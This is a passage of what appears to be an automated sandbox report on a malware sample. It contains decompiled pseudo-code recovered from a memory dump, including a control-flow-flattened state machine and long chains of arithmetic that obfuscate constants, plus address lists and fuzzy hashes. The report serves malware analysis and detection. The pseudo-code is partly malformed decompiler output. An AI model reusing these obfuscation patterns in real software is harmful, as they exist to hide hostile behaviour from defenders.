                                                                                                                                                                                                                    										_t299 = 0xfe7a440;
                                                                                                                                                                                                                    										goto L11;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t299 == 0x993b58c) {
                                                                                                                                                                                                                    										_t299 = 0x9c75cc1;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t299 == 0x9c75cc1) {
                                                                                                                                                                                                                    											_push(_t269);
                                                                                                                                                                                                                    											_push(_t269);
                                                                                                                                                                                                                    											_push(1);
                                                                                                                                                                                                                    											_t274 = 0x10;
                                                                                                                                                                                                                    											_t302 = E00A75103(_t274);
                                                                                                                                                                                                                    											E00A7CD47(_v200,  &_v128, _t302, _v172, 0xb, _v192);
                                                                                                                                                                                                                    											_t299 = 0x89022b3;
                                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                                    											_t303 =  &(_t303[7]);
                                                                                                                                                                                                                    											L11:
                                                                                                                                                                                                                    											_t269 = _v176;
                                                                                                                                                                                                                    											goto L1;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t299 != 0xfe7a440) {
                                                                                                                                                                                                                    												goto L17;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												_t302 = 0x4000;
                                                                                                                                                                                                                    												_t298 = E00A7C6D9(0x4000);
                                                                                                                                                                                                                    												_t249 = 0x4b068bc;
                                                                                                                                                                                                                    												_t269 = _v176;
                                                                                                                                                                                                                    												_t299 =  !=  ? 0x4b068bc : 0x8a7015;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						E00A76A6B(_t266, _v180, _v188, _v196, _v204);
                                                                                                                                                                                                                    						_t269 = _v176;
                                                                                                                                                                                                                    						_t303 =  &(_t303[3]);
                                                                                                                                                                                                                    						_t299 = 0xe71a59e;
                                                                                                                                                                                                                    						_t249 = 0x4b068bc;
                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                    						__eflags = _t299 - 0xe71a59e;
                                                                                                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                    					return _t298;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}










































                                                                                                                                                                                                                    0x00a61914
                                                                                                                                                                                                                    0x00a6191e
                                                                                                                                                                                                                    0x00a61922
                                                                                                                                                                                                                    0x00a6192c
                                                                                                                                                                                                                    0x00a61931
                                                                                                                                                                                                                    0x00a61939
                                                                                                                                                                                                                    0x00a61941
                                                                                                                                                                                                                    0x00a61949
                                                                                                                                                                                                                    0x00a61951
                                                                                                                                                                                                                    0x00a61959
                                                                                                                                                                                                                    0x00a6195e
                                                                                                                                                                                                                    0x00a61966
                                                                                                                                                                                                                    0x00a6196e
                                                                                                                                                                                                                    0x00a61976
                                                                                                                                                                                                                    0x00a6197b
                                                                                                                                                                                                                    0x00a61983
                                                                                                                                                                                                                    0x00a6198b
                                                                                                                                                                                                                    0x00a61993
                                                                                                                                                                                                                    0x00a619a1
                                                                                                                                                                                                                    0x00a619a6
                                                                                                                                                                                                                    0x00a619b1
                                                                                                                                                                                                                    0x00a619b6
                                                                                                                                                                                                                    0x00a619b9
                                                                                                                                                                                                                    0x00a619c2
                                                                                                                                                                                                                    0x00a619c6
                                                                                                                                                                                                                    0x00a619ce
                                                                                                                                                                                                                    0x00a619db
                                                                                                                                                                                                                    0x00a619df
                                                                                                                                                                                                                    0x00a619e3
                                                                                                                                                                                                                    0x00a619eb
                                                                                                                                                                                                                    0x00a619f3
                                                                                                                                                                                                                    0x00a619fb
                                                                                                                                                                                                                    0x00a61a00
                                                                                                                                                                                                                    0x00a61a05
                                                                                                                                                                                                                    0x00a61a0d
                                                                                                                                                                                                                    0x00a61a15
                                                                                                                                                                                                                    0x00a61a1d
                                                                                                                                                                                                                    0x00a61a22
                                                                                                                                                                                                                    0x00a61a2a
                                                                                                                                                                                                                    0x00a61a32
                                                                                                                                                                                                                    0x00a61a3a
                                                                                                                                                                                                                    0x00a61a3f
                                                                                                                                                                                                                    0x00a61a47
                                                                                                                                                                                                                    0x00a61a4f
                                                                                                                                                                                                                    0x00a61a57
                                                                                                                                                                                                                    0x00a61a5f
                                                                                                                                                                                                                    0x00a61a67
                                                                                                                                                                                                                    0x00a61a6f
                                                                                                                                                                                                                    0x00a61a77
                                                                                                                                                                                                                    0x00a61a7f
                                                                                                                                                                                                                    0x00a61a84
                                                                                                                                                                                                                    0x00a61a8c
                                                                                                                                                                                                                    0x00a61a94
                                                                                                                                                                                                                    0x00a61a9c
                                                                                                                                                                                                                    0x00a61aa9
                                                                                                                                                                                                                    0x00a61aad
                                                                                                                                                                                                                    0x00a61ab5
                                                                                                                                                                                                                    0x00a61ac2
                                                                                                                                                                                                                    0x00a61ac3
                                                                                                                                                                                                                    0x00a61acd
                                                                                                                                                                                                                    0x00a61ad6
                                                                                                                                                                                                                    0x00a61ada
                                                                                                                                                                                                                    0x00a61ae4
                                                                                                                                                                                                                    0x00a61aec
                                                                                                                                                                                                                    0x00a61af8
                                                                                                                                                                                                                    0x00a61afb
                                                                                                                                                                                                                    0x00a61aff
                                                                                                                                                                                                                    0x00a61b03
                                                                                                                                                                                                                    0x00a61b0b
                                                                                                                                                                                                                    0x00a61b13
                                                                                                                                                                                                                    0x00a61b1b
                                                                                                                                                                                                                    0x00a61b23
                                                                                                                                                                                                                    0x00a61b2b
                                                                                                                                                                                                                    0x00a61b33
                                                                                                                                                                                                                    0x00a61b3b
                                                                                                                                                                                                                    0x00a61b43
                                                                                                                                                                                                                    0x00a61b4b
                                                                                                                                                                                                                    0x00a61b53
                                                                                                                                                                                                                    0x00a61b5b
                                                                                                                                                                                                                    0x00a61b63
                                                                                                                                                                                                                    0x00a61b6b
                                                                                                                                                                                                                    0x00a61b7b
                                                                                                                                                                                                                    0x00a61b7f
                                                                                                                                                                                                                    0x00a61b83
                                                                                                                                                                                                                    0x00a61b8b
                                                                                                                                                                                                                    0x00a61b93
                                                                                                                                                                                                                    0x00a61ba0
                                                                                                                                                                                                                    0x00a61ba1
                                                                                                                                                                                                                    0x00a61ba5
                                                                                                                                                                                                                    0x00a61bad
                                                                                                                                                                                                                    0x00a61bb5
                                                                                                                                                                                                                    0x00a61bbd
                                                                                                                                                                                                                    0x00a61bc7
                                                                                                                                                                                                                    0x00a61bd1
                                                                                                                                                                                                                    0x00a61bd5
                                                                                                                                                                                                                    0x00a61bd9
                                                                                                                                                                                                                    0x00a61be1
                                                                                                                                                                                                                    0x00a61be9
                                                                                                                                                                                                                    0x00a61bf1
                                                                                                                                                                                                                    0x00a61bf6
                                                                                                                                                                                                                    0x00a61bfe
                                                                                                                                                                                                                    0x00a61c06
                                                                                                                                                                                                                    0x00a61c0e
                                                                                                                                                                                                                    0x00a61c16
                                                                                                                                                                                                                    0x00a61c1e
                                                                                                                                                                                                                    0x00a61c26
                                                                                                                                                                                                                    0x00a61c2e
                                                                                                                                                                                                                    0x00a61c36
                                                                                                                                                                                                                    0x00a61c3e
                                                                                                                                                                                                                    0x00a61c46
                                                                                                                                                                                                                    0x00a61c4b
                                                                                                                                                                                                                    0x00a61c53
                                                                                                                                                                                                                    0x00a61c53
                                                                                                                                                                                                                    0x00a61c53
                                                                                                                                                                                                                    0x00a61c58
                                                                                                                                                                                                                    0x00a61c58
                                                                                                                                                                                                                    0x00a61c66
                                                                                                                                                                                                                    0x00a61d41
                                                                                                                                                                                                                    0x00a61d4a
                                                                                                                                                                                                                    0x00a61d4e
                                                                                                                                                                                                                    0x00a61d56
                                                                                                                                                                                                                    0x00a61d5b
                                                                                                                                                                                                                    0x00a61d69
                                                                                                                                                                                                                    0x00a61d6a
                                                                                                                                                                                                                    0x00a61d6b
                                                                                                                                                                                                                    0x00a61d6c
                                                                                                                                                                                                                    0x00a61d6d
                                                                                                                                                                                                                    0x00a61d79
                                                                                                                                                                                                                    0x00a61d89
                                                                                                                                                                                                                    0x00a61d8e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a61c6c
                                                                                                                                                                                                                    0x00a61c72
                                                                                                                                                                                                                    0x00a61d2d
                                                                                                                                                                                                                    0x00a61d2f
                                                                                                                                                                                                                    0x00a61d32
                                                                                                                                                                                                                    0x00a61d34
                                                                                                                                                                                                                    0x00a61d3a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a61d3a
                                                                                                                                                                                                                    0x00a61c78
                                                                                                                                                                                                                    0x00a61c7e
                                                                                                                                                                                                                    0x00a61d09
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a61c84
                                                                                                                                                                                                                    0x00a61c8a
                                                                                                                                                                                                                    0x00a61ccf
                                                                                                                                                                                                                    0x00a61cd0
                                                                                                                                                                                                                    0x00a61cd1
                                                                                                                                                                                                                    0x00a61cd5
                                                                                                                                                                                                                    0x00a61cdf
                                                                                                                                                                                                                    0x00a61cf3
                                                                                                                                                                                                                    0x00a61cf8
                                                                                                                                                                                                                    0x00a61cfd
                                                                                                                                                                                                                    0x00a61cfd
                                                                                                                                                                                                                    0x00a61d00
                                                                                                                                                                                                                    0x00a61d00
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a61c8c
                                                                                                                                                                                                                    0x00a61c92
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a61c98
                                                                                                                                                                                                                    0x00a61c9c
                                                                                                                                                                                                                    0x00a61cab
                                                                                                                                                                                                                    0x00a61cb4
                                                                                                                                                                                                                    0x00a61cba
                                                                                                                                                                                                                    0x00a61cbe
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a61cbe
                                                                                                                                                                                                                    0x00a61c92
                                                                                                                                                                                                                    0x00a61c8a
                                                                                                                                                                                                                    0x00a61c7e
                                                                                                                                                                                                                    0x00a61c72
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a61c66
                                                                                                                                                                                                                    0x00a61daa
                                                                                                                                                                                                                    0x00a61daf
                                                                                                                                                                                                                    0x00a61db3
                                                                                                                                                                                                                    0x00a61db6
                                                                                                                                                                                                                    0x00a61dbb
                                                                                                                                                                                                                    0x00a61dc0
                                                                                                                                                                                                                    0x00a61dc0
                                                                                                                                                                                                                    0x00a61dc0
                                                                                                                                                                                                                    0x00a61dcc
                                                                                                                                                                                                                    0x00a61dd8
                                                                                                                                                                                                                    0x00a61dd8

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $$2|$BF$GA.$H$M>+,$eP<y
                                                                                                                                                                                                                    • API String ID: 0-821150318
                                                                                                                                                                                                                    • Opcode ID: 4656b357979852f35478b1d7284db826befe5bc0bd1be46162f0874a82fa1206
                                                                                                                                                                                                                    • Instruction ID: 9f244c04d8be340ab1bb4d3ab6b9cdabca9a17e523830442b07403c0cbc943a2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4656b357979852f35478b1d7284db826befe5bc0bd1be46162f0874a82fa1206
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63C111729093809FC364CF2AC98A50BFBF1BBC4758F40991DF5A5A6260D3B5C90ACF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                    			E00A75ECA(void* __ecx) {
                                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                                    				char _v1044;
                                                                                                                                                                                                                    				char _v1564;
                                                                                                                                                                                                                    				signed int _v1568;
                                                                                                                                                                                                                    				intOrPtr _v1572;
                                                                                                                                                                                                                    				intOrPtr _v1576;
                                                                                                                                                                                                                    				intOrPtr _v1588;
                                                                                                                                                                                                                    				char _v1592;
                                                                                                                                                                                                                    				signed int _v1596;
                                                                                                                                                                                                                    				signed int _v1600;
                                                                                                                                                                                                                    				signed int _v1604;
                                                                                                                                                                                                                    				signed int _v1608;
                                                                                                                                                                                                                    				signed int _v1612;
                                                                                                                                                                                                                    				signed int _v1616;
                                                                                                                                                                                                                    				signed int _v1620;
                                                                                                                                                                                                                    				signed int _v1624;
                                                                                                                                                                                                                    				signed int _v1628;
                                                                                                                                                                                                                    				signed int _v1632;
                                                                                                                                                                                                                    				signed int _v1636;
                                                                                                                                                                                                                    				signed int _v1640;
                                                                                                                                                                                                                    				signed int _v1644;
                                                                                                                                                                                                                    				signed int _v1648;
                                                                                                                                                                                                                    				unsigned int _v1652;
                                                                                                                                                                                                                    				signed int _v1656;
                                                                                                                                                                                                                    				signed int _v1660;
                                                                                                                                                                                                                    				signed int _v1664;
                                                                                                                                                                                                                    				signed int _v1668;
                                                                                                                                                                                                                    				signed int _v1672;
                                                                                                                                                                                                                    				signed int _v1676;
                                                                                                                                                                                                                    				signed int _v1680;
                                                                                                                                                                                                                    				signed int _v1684;
                                                                                                                                                                                                                    				signed int _v1688;
                                                                                                                                                                                                                    				signed int _v1692;
                                                                                                                                                                                                                    				signed int _v1696;
                                                                                                                                                                                                                    				signed int _v1700;
                                                                                                                                                                                                                    				signed int _v1704;
                                                                                                                                                                                                                    				signed int _v1708;
                                                                                                                                                                                                                    				signed int _v1712;
                                                                                                                                                                                                                    				signed int _v1716;
                                                                                                                                                                                                                    				signed int _v1720;
                                                                                                                                                                                                                    				signed int _v1724;
                                                                                                                                                                                                                    				signed int _v1728;
                                                                                                                                                                                                                    				signed int _v1732;
                                                                                                                                                                                                                    				signed int _v1736;
                                                                                                                                                                                                                    				signed int _v1740;
                                                                                                                                                                                                                    				signed int _v1744;
                                                                                                                                                                                                                    				signed int _v1748;
                                                                                                                                                                                                                    				signed int _v1752;
                                                                                                                                                                                                                    				signed int _v1756;
                                                                                                                                                                                                                    				signed int _v1760;
                                                                                                                                                                                                                    				signed int _v1764;
                                                                                                                                                                                                                    				signed int _v1768;
                                                                                                                                                                                                                    				signed int _v1772;
                                                                                                                                                                                                                    				signed int _v1776;
                                                                                                                                                                                                                    				signed int _v1780;
                                                                                                                                                                                                                    				signed int _v1784;
                                                                                                                                                                                                                    				signed int _v1788;
                                                                                                                                                                                                                    				signed int _v1792;
                                                                                                                                                                                                                    				signed int _v1796;
                                                                                                                                                                                                                    				signed int _v1800;
                                                                                                                                                                                                                    				signed int _v1804;
                                                                                                                                                                                                                    				signed int _v1808;
                                                                                                                                                                                                                    				signed int _v1812;
                                                                                                                                                                                                                    				void* _t515;
                                                                                                                                                                                                                    				void* _t528;
                                                                                                                                                                                                                    				void* _t529;
                                                                                                                                                                                                                    				void* _t533;
                                                                                                                                                                                                                    				void* _t537;
                                                                                                                                                                                                                    				void* _t543;
                                                                                                                                                                                                                    				signed int _t545;
                                                                                                                                                                                                                    				signed int _t546;
                                                                                                                                                                                                                    				signed int _t547;
                                                                                                                                                                                                                    				signed int _t548;
                                                                                                                                                                                                                    				signed int _t549;
                                                                                                                                                                                                                    				signed int _t550;
                                                                                                                                                                                                                    				signed int _t551;
                                                                                                                                                                                                                    				signed int _t552;
                                                                                                                                                                                                                    				void* _t553;
                                                                                                                                                                                                                    				signed int _t602;
                                                                                                                                                                                                                    				void* _t604;
                                                                                                                                                                                                                    				signed int* _t609;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t609 =  &_v1812;
                                                                                                                                                                                                                    				_v1596 = _v1596 & 0x00000000;
                                                                                                                                                                                                                    				_v1568 = _v1568 & 0x00000000;
                                                                                                                                                                                                                    				_v1576 = 0xa1bc5a;
                                                                                                                                                                                                                    				_v1572 = 0xbcb187;
                                                                                                                                                                                                                    				_v1748 = 0x64f6ce;
                                                                                                                                                                                                                    				_v1748 = _v1748 >> 1;
                                                                                                                                                                                                                    				_v1748 = _v1748 + 0xffff26b3;
                                                                                                                                                                                                                    				_v1748 = _v1748 + 0xffff8e23;
                                                                                                                                                                                                                    				_v1748 = _v1748 ^ 0x0231303d;
                                                                                                                                                                                                                    				_v1728 = 0xf72222;
                                                                                                                                                                                                                    				_t543 = __ecx;
                                                                                                                                                                                                                    				_t604 = 0xce363e6;
                                                                                                                                                                                                                    				_t545 = 0x44;
                                                                                                                                                                                                                    				_v1728 = _v1728 / _t545;
                                                                                                                                                                                                                    				_v1728 = _v1728 << 0xb;
                                                                                                                                                                                                                    				_v1728 = _v1728 ^ 0x1d112618;
                                                                                                                                                                                                                    				_v1652 = 0xab9fd8;
                                                                                                                                                                                                                    				_v1652 = _v1652 >> 9;
                                                                                                                                                                                                                    				_v1652 = _v1652 ^ 0x000e778d;
                                                                                                                                                                                                                    				_v1620 = 0x5e13;
                                                                                                                                                                                                                    				_v1620 = _v1620 << 0xd;
                                                                                                                                                                                                                    				_v1620 = _v1620 ^ 0x0bc9ab48;
                                                                                                                                                                                                                    				_v1804 = 0x63d842;
                                                                                                                                                                                                                    				_v1804 = _v1804 + 0xffff26d3;
                                                                                                                                                                                                                    				_v1804 = _v1804 | 0x9b55721d;
                                                                                                                                                                                                                    				_v1804 = _v1804 + 0xffff039c;
                                                                                                                                                                                                                    				_v1804 = _v1804 ^ 0x9b7af5d5;
                                                                                                                                                                                                                    				_v1704 = 0xdb6725;
                                                                                                                                                                                                                    				_v1704 = _v1704 << 5;
                                                                                                                                                                                                                    				_v1704 = _v1704 + 0x2cc7;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0x1b6aaa3e;
                                                                                                                                                                                                                    				_v1716 = 0xbda7aa;
                                                                                                                                                                                                                    				_v1716 = _v1716 + 0xffff7152;
                                                                                                                                                                                                                    				_v1716 = _v1716 + 0x1304;
                                                                                                                                                                                                                    				_v1716 = _v1716 ^ 0x00bfe9bd;
                                                                                                                                                                                                                    				_v1788 = 0xf4da04;
                                                                                                                                                                                                                    				_v1788 = _v1788 >> 0x10;
                                                                                                                                                                                                                    				_t546 = 0x25;
                                                                                                                                                                                                                    				_v1788 = _v1788 * 0x33;
                                                                                                                                                                                                                    				_v1788 = _v1788 + 0xffff6297;
                                                                                                                                                                                                                    				_v1788 = _v1788 ^ 0xfff5f4f7;
                                                                                                                                                                                                                    				_v1756 = 0x5eb6c6;
                                                                                                                                                                                                                    				_v1756 = _v1756 + 0xffff08b7;
                                                                                                                                                                                                                    				_v1756 = _v1756 + 0x5794;
                                                                                                                                                                                                                    				_v1756 = _v1756 / _t546;
                                                                                                                                                                                                                    				_v1756 = _v1756 ^ 0x0007f203;
                                                                                                                                                                                                                    				_v1796 = 0x21fbd9;
                                                                                                                                                                                                                    				_v1796 = _v1796 ^ 0xa856ffa1;
                                                                                                                                                                                                                    				_v1796 = _v1796 * 0x2b;
                                                                                                                                                                                                                    				_v1796 = _v1796 << 0xf;
                                                                                                                                                                                                                    				_v1796 = _v1796 ^ 0xe015c765;
                                                                                                                                                                                                                    				_v1772 = 0xb8d9f4;
                                                                                                                                                                                                                    				_v1772 = _v1772 * 0xa;
                                                                                                                                                                                                                    				_v1772 = _v1772 + 0x78cc;
                                                                                                                                                                                                                    				_v1772 = _v1772 + 0xffff1798;
                                                                                                                                                                                                                    				_v1772 = _v1772 ^ 0x073b6e47;
                                                                                                                                                                                                                    				_v1660 = 0x591edc;
                                                                                                                                                                                                                    				_v1660 = _v1660 | 0x02bf6ae1;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0x02fc56e8;
                                                                                                                                                                                                                    				_v1764 = 0xeb780e;
                                                                                                                                                                                                                    				_v1764 = _v1764 << 8;
                                                                                                                                                                                                                    				_v1764 = _v1764 >> 9;
                                                                                                                                                                                                                    				_v1764 = _v1764 ^ 0x8dfab725;
                                                                                                                                                                                                                    				_v1764 = _v1764 ^ 0x8d8d7f4f;
                                                                                                                                                                                                                    				_v1720 = 0xa9c4a7;
                                                                                                                                                                                                                    				_t547 = 0x7c;
                                                                                                                                                                                                                    				_v1720 = _v1720 / _t547;
                                                                                                                                                                                                                    				_v1720 = _v1720 ^ 0xc94283ee;
                                                                                                                                                                                                                    				_v1720 = _v1720 ^ 0xc9497aa0;
                                                                                                                                                                                                                    				_v1780 = 0xb60ab2;
                                                                                                                                                                                                                    				_v1780 = _v1780 + 0x8151;
                                                                                                                                                                                                                    				_t548 = 0x7b;
                                                                                                                                                                                                                    				_v1780 = _v1780 * 0x17;
                                                                                                                                                                                                                    				_v1780 = _v1780 << 8;
                                                                                                                                                                                                                    				_v1780 = _v1780 ^ 0x669362bd;
                                                                                                                                                                                                                    				_v1688 = 0x1422b9;
                                                                                                                                                                                                                    				_v1688 = _v1688 ^ 0x4dcc1ba2;
                                                                                                                                                                                                                    				_v1688 = _v1688 + 0xb449;
                                                                                                                                                                                                                    				_v1688 = _v1688 ^ 0x4dd578de;
                                                                                                                                                                                                                    				_v1672 = 0x345dca;
                                                                                                                                                                                                                    				_v1672 = _v1672 << 2;
                                                                                                                                                                                                                    				_v1672 = _v1672 ^ 0x00d602c9;
                                                                                                                                                                                                                    				_v1600 = 0xb21bbb;
                                                                                                                                                                                                                    				_v1600 = _v1600 << 2;
                                                                                                                                                                                                                    				_v1600 = _v1600 ^ 0x02ce3917;
                                                                                                                                                                                                                    				_v1812 = 0xde8567;
                                                                                                                                                                                                                    				_v1812 = _v1812 ^ 0xc125a153;
                                                                                                                                                                                                                    				_v1812 = _v1812 << 7;
                                                                                                                                                                                                                    				_v1812 = _v1812 >> 4;
                                                                                                                                                                                                                    				_v1812 = _v1812 ^ 0x0fd52bec;
                                                                                                                                                                                                                    				_v1696 = 0x5cea44;
                                                                                                                                                                                                                    				_v1696 = _v1696 + 0xc65;
                                                                                                                                                                                                                    				_v1696 = _v1696 ^ 0x433e749d;
                                                                                                                                                                                                                    				_v1696 = _v1696 ^ 0x43622757;
                                                                                                                                                                                                                    				_v1644 = 0xc83be1;
                                                                                                                                                                                                                    				_v1644 = _v1644 << 0xb;
                                                                                                                                                                                                                    				_v1644 = _v1644 ^ 0x41da1d1d;
                                                                                                                                                                                                                    				_v1680 = 0x8c2f4c;
                                                                                                                                                                                                                    				_v1680 = _v1680 + 0xffff2dd1;
                                                                                                                                                                                                                    				_v1680 = _v1680 | 0xc585d55c;
                                                                                                                                                                                                                    				_v1680 = _v1680 ^ 0xc58537e0;
                                                                                                                                                                                                                    				_v1712 = 0xfd4ab9;
                                                                                                                                                                                                                    				_v1712 = _v1712 >> 9;
                                                                                                                                                                                                                    				_v1712 = _v1712 | 0x07654a74;
                                                                                                                                                                                                                    				_v1712 = _v1712 ^ 0x07636fab;
                                                                                                                                                                                                                    				_v1612 = 0x4ca88d;
                                                                                                                                                                                                                    				_v1612 = _v1612 * 0x47;
                                                                                                                                                                                                                    				_v1612 = _v1612 ^ 0x1548fbc5;
                                                                                                                                                                                                                    				_v1604 = 0xd90070;
                                                                                                                                                                                                                    				_v1604 = _v1604 * 0x73;
                                                                                                                                                                                                                    				_v1604 = _v1604 ^ 0x617666a0;
                                                                                                                                                                                                                    				_v1732 = 0x82d46e;
                                                                                                                                                                                                                    				_v1732 = _v1732 + 0xffff8de9;
                                                                                                                                                                                                                    				_v1732 = _v1732 / _t548;
                                                                                                                                                                                                                    				_v1732 = _v1732 ^ 0x000434d8;
                                                                                                                                                                                                                    				_v1736 = 0xfc3b03;
                                                                                                                                                                                                                    				_v1736 = _v1736 * 0x4c;
                                                                                                                                                                                                                    				_v1736 = _v1736 << 0xd;
                                                                                                                                                                                                                    				_v1736 = _v1736 ^ 0x3095ccf8;
                                                                                                                                                                                                                    				_v1724 = 0x465b31;
                                                                                                                                                                                                                    				_v1724 = _v1724 >> 5;
                                                                                                                                                                                                                    				_v1724 = _v1724 + 0xffff9fd2;
                                                                                                                                                                                                                    				_v1724 = _v1724 ^ 0x000d403d;
                                                                                                                                                                                                                    				_v1616 = 0x6ba19f;
                                                                                                                                                                                                                    				_v1616 = _v1616 >> 0xc;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0x000144eb;
                                                                                                                                                                                                                    				_v1636 = 0xe22261;
                                                                                                                                                                                                                    				_v1636 = _v1636 << 7;
                                                                                                                                                                                                                    				_v1636 = _v1636 ^ 0x711f8d21;
                                                                                                                                                                                                                    				_v1608 = 0x9c1b47;
                                                                                                                                                                                                                    				_v1608 = _v1608 ^ 0x2e994423;
                                                                                                                                                                                                                    				_v1608 = _v1608 ^ 0x2e0ce198;
                                                                                                                                                                                                                    				_v1792 = 0xf8addb;
                                                                                                                                                                                                                    				_v1792 = _v1792 << 0xb;
                                                                                                                                                                                                                    				_v1792 = _v1792 | 0xdebd7ebb;
                                                                                                                                                                                                                    				_v1792 = _v1792 ^ 0xdff9fcd2;
                                                                                                                                                                                                                    				_v1628 = 0xa71cc6;
                                                                                                                                                                                                                    				_v1628 = _v1628 + 0xcd8e;
                                                                                                                                                                                                                    				_v1628 = _v1628 ^ 0x00a1774c;
                                                                                                                                                                                                                    				_v1800 = 0x79b0b3;
                                                                                                                                                                                                                    				_v1800 = _v1800 ^ 0x08051d85;
                                                                                                                                                                                                                    				_v1800 = _v1800 | 0xee71d404;
                                                                                                                                                                                                                    				_v1800 = _v1800 >> 9;
                                                                                                                                                                                                                    				_v1800 = _v1800 ^ 0x0074eeff;
                                                                                                                                                                                                                    				_v1808 = 0x5c1396;
                                                                                                                                                                                                                    				_v1808 = _v1808 + 0x4aa6;
                                                                                                                                                                                                                    				_v1808 = _v1808 << 0xd;
                                                                                                                                                                                                                    				_v1808 = _v1808 >> 0xf;
                                                                                                                                                                                                                    				_v1808 = _v1808 ^ 0x000ad89b;
                                                                                                                                                                                                                    				_v1708 = 0x8c27cb;
                                                                                                                                                                                                                    				_v1708 = _v1708 | 0xb0780b52;
                                                                                                                                                                                                                    				_v1708 = _v1708 + 0xc0aa;
                                                                                                                                                                                                                    				_v1708 = _v1708 ^ 0xb0fb7dd1;
                                                                                                                                                                                                                    				_v1740 = 0x1a238e;
                                                                                                                                                                                                                    				_v1740 = _v1740 ^ 0x131697cc;
                                                                                                                                                                                                                    				_v1740 = _v1740 >> 0xd;
                                                                                                                                                                                                                    				_v1740 = _v1740 ^ 0x000f30f6;
                                                                                                                                                                                                                    				_v1668 = 0x79cc4c;
                                                                                                                                                                                                                    				_t549 = 0xd;
                                                                                                                                                                                                                    				_v1668 = _v1668 / _t549;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0x000b6b4b;
                                                                                                                                                                                                                    				_v1656 = 0xd266a2;
                                                                                                                                                                                                                    				_t550 = 0x27;
                                                                                                                                                                                                                    				_v1656 = _v1656 * 0x72;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0x5db8a523;
                                                                                                                                                                                                                    				_v1784 = 0xaf4e2b;
                                                                                                                                                                                                                    				_v1784 = _v1784 ^ 0x8865ad40;
                                                                                                                                                                                                                    				_v1784 = _v1784 | 0x29578c8c;
                                                                                                                                                                                                                    				_v1784 = _v1784 >> 0xc;
                                                                                                                                                                                                                    				_v1784 = _v1784 ^ 0x00098e27;
                                                                                                                                                                                                                    				_v1664 = 0xeedb0d;
                                                                                                                                                                                                                    				_v1664 = _v1664 >> 2;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0x00305683;
                                                                                                                                                                                                                    				_v1752 = 0x580731;
                                                                                                                                                                                                                    				_v1752 = _v1752 >> 0xd;
                                                                                                                                                                                                                    				_v1752 = _v1752 / _t550;
                                                                                                                                                                                                                    				_v1752 = _v1752 + 0xffff5181;
                                                                                                                                                                                                                    				_v1752 = _v1752 ^ 0xfffdb0ac;
                                                                                                                                                                                                                    				_v1648 = 0x383a2d;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0x2ccf15b7;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0x2cf78205;
                                                                                                                                                                                                                    				_v1760 = 0x93a557;
                                                                                                                                                                                                                    				_v1760 = _v1760 >> 3;
                                                                                                                                                                                                                    				_v1760 = _v1760 + 0xffffb891;
                                                                                                                                                                                                                    				_v1760 = _v1760 << 0xe;
                                                                                                                                                                                                                    				_v1760 = _v1760 ^ 0x8b48a79e;
                                                                                                                                                                                                                    				_v1692 = 0x8a0715;
                                                                                                                                                                                                                    				_v1692 = _v1692 >> 6;
                                                                                                                                                                                                                    				_v1692 = _v1692 + 0xffffec82;
                                                                                                                                                                                                                    				_v1692 = _v1692 ^ 0x000fc987;
                                                                                                                                                                                                                    				_v1640 = 0xfbce31;
                                                                                                                                                                                                                    				_t551 = 0x4d;
                                                                                                                                                                                                                    				_v1640 = _v1640 * 0x66;
                                                                                                                                                                                                                    				_v1640 = _v1640 ^ 0x645f6514;
                                                                                                                                                                                                                    				_v1684 = 0xbedd6f;
                                                                                                                                                                                                                    				_v1684 = _v1684 / _t551;
                                                                                                                                                                                                                    				_v1684 = _v1684 << 1;
                                                                                                                                                                                                                    				_v1684 = _v1684 ^ 0x000ce7fa;
                                                                                                                                                                                                                    				_v1744 = 0x99e2ff;
                                                                                                                                                                                                                    				_v1744 = _v1744 + 0xffffed23;
                                                                                                                                                                                                                    				_v1744 = _v1744 ^ 0x66e7250e;
                                                                                                                                                                                                                    				_v1744 = _v1744 | 0x5ff63174;
                                                                                                                                                                                                                    				_v1744 = _v1744 ^ 0x7ffe0ca9;
                                                                                                                                                                                                                    				_v1624 = 0x4d701e;
